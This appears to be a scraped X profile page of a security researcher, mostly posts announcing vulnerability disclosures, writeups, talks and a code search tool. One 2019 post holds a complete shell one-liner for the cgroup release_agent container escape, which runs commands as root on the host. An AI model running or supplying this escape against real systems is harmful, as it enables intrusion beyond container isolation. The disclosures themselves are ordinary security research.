Log inSign up
Felix Wilhelm
1,325 posts
user avatar
Felix Wilhelm
@_fel1x
Co-founder and CTO of @asymmetric_re
asymmetric.re
Joined November 2010
771
Following
11K
Followers
RepliesRepliesMediaMedia

New to X?

Sign up now to get your own personalized timeline!

Create account

By signing up, you agree to the Terms of Service and Privacy Policy, including Cookie Use.

Terms·Privacy·Cookies·Accessibility·Ads Info·© 2026 X Corp.
Don't miss what's happening
People on X are the first to know.
Log inSign up
  • Pinned
    user avatar
    Felix Wilhelm
    @_fel1x
    Jan 18, 2024
    I’ve started a new security company together with @claudijd: Asymmetric Research (@asymmetric_re / asymmetric.re ). If you are a strong security engineer or researcher interested in defending and breaking some of the biggest DeFI and Blockchain projects, we’d love to
    Image
    Asymmetric Research | Enabling Secure Innovation
    From asymmetric.re
    29K
  • user avatar
    Felix Wilhelm
    @_fel1x
    Mar 4, 2022
    I stumbled upon a fun heap overflow in Github's markdown rendering library. RCE via a malicious README 🤔 Demonstrates the risk of memory unsafe dependencies used by scripting languages. github.com/github/cmark-g…
    Image
  • user avatar
    Felix Wilhelm
    @_fel1x
    Mar 10, 2021
    You might want to update your F5 Big IP appliances: support.f5.com/csp/article/K0…. bugs.chromium.org/p/project-zero… and bugs.chromium.org/p/project-zero… are two data-plane bugs that got fixed.
    Image
  • user avatar
    Felix Wilhelm
    @_fel1x
    Oct 16, 2022
    Slides for my SAML talk at @hexacon_fr are now online: drive.google.com/file/d/1p1tTTI…. Includes details of CVE-2022-34169, a fun JIT bug that you should check out.
    drive.google.com
    Hacking the Cloud With SAML.pdf
  • user avatar
    Felix Wilhelm
    @_fel1x
    Apr 21, 2020
    My writeup for the haproxy http2 bug (CVE-2020-11100) is now public: bugs.chromium.org/p/project-zero…. Includes a PoC exploit to demonstrate RCE against Ubuntu 19.10.
  • user avatar
    Felix Wilhelm
    @_fel1x
    Apr 6, 2022
    My report for this bug is now public: bugs.chromium.org/p/project-zero…. Thanks @github for donating a 40000$ bounty to Médecins Sans Frontières (msf.org)
    user avatar
    Felix Wilhelm
    @_fel1x
    Mar 4, 2022
    I stumbled upon a fun heap overflow in Github's markdown rendering library. RCE via a malicious README 🤔 Demonstrates the risk of memory unsafe dependencies used by scripting languages. github.com/github/cmark-g…
    Image
  • user avatar
    Felix Wilhelm
    @_fel1x
    May 15, 2018
    CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: access.redhat.com/security/vulne…. Exploit fits in a tweet so you should patch as soon as possible.
    Image
    access.redhat.com
    DHCP Client Script Code Execution Vulnerability - CVE-2018-1111 | Red Hat Customer Portal
    Access Red Hat’s knowledge, guidance, and support through your subscription.
  • user avatar
    Felix Wilhelm
    @_fel1x
    Oct 6, 2020
    Enter the Vault: Authentication Issues in HashiCorp Vault
    Image
    Enter the Vault: Authentication Issues in HashiCorp Vault
    From projectzero.google
  • user avatar
    Felix Wilhelm
    @_fel1x
    May 9, 2017
    Happy to hear that Windows is secure again now that MS patched the last remaining bug in their unsandboxed, system-privileged JS runtime.
  • user avatar
    Felix Wilhelm
    @_fel1x
    Jul 17, 2019
    d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
  • user avatar
    Felix Wilhelm
    @_fel1x
    Jun 29, 2021
    An EPYC escape: Case-study of a KVM breakout
    Image
    An EPYC escape: Case-study of a KVM breakout
    From projectzero.google
  • user avatar
    Felix Wilhelm
    @_fel1x
    Sep 30, 2021
    weggli, my attempt at writing a fast and robust semantic search tool for C and C++ code is now open source: github.com/googleprojectz…. Please take a look and let me know what you think.
    Image
    GIF
  • user avatar
    Felix Wilhelm
    @_fel1x
    Oct 2, 2017
    We found some interesting bugs in dnsmasq:
    Image
    security.googleblog.com
    Behind the Masq: Yet more DNS, and DHCP, vulnerabilities
    Posted by Fermin J. Serna, Staff Software Engineer, Matt Linton, Senior Security Engineer and Kevin Stadmeyer, Technical Program Manager O...
  • user avatar
    Felix Wilhelm
    @_fel1x
    Aug 25, 2022
    If you perform SAML auth in Java you should make sure you patched bugs.chromium.org/p/project-zero…. RCE during signature verification. Blogpost coming soon™.
Advertisement
Advertisement